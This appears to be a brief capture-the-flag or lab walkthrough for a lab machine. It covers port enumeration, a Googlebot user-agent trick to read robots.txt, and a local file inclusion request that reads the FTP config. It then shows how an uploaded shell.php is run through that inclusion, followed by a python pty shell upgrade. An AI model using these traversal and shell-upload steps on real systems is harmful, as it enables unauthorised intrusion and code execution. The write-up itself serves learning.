Malleum Knowledge Base

Enumeration

1 min read

Ports Open

  1. 80
  2. 21
  3. 22

Robots.txt

As the apache server was working.I tried to check the robot.txt. But I gave me a message that I am not a search engine.
So I changed the User_Agent to Googlebot and it worked. It showed me a extra page secret_information.

LFI

Looking at secret_information showed that there is LFI vulneratibility. Two new users were identified.

Root Tom

Looking at FTP

  1. Anonymous login is allowed with write permission

Writer enable

GET /secret_information/?lang=../../../../../etc/vsftpd.conf HTTP/1.1
Host: 192.168.171.14
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
 
 
 
 
#
# Uncomment this to indicate that vsftpd use a utf8 filesystem.
#utf8_filesystem=YES
#
# Point users at the directory we created earlier.
anon_root=/var/ftp/
write_enable=YES
#

Getting a shell

http://192.168.171.14/secret_information/?lang=../../../../../var/ftp/pub/shell.php

Upgrading the shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

Graph View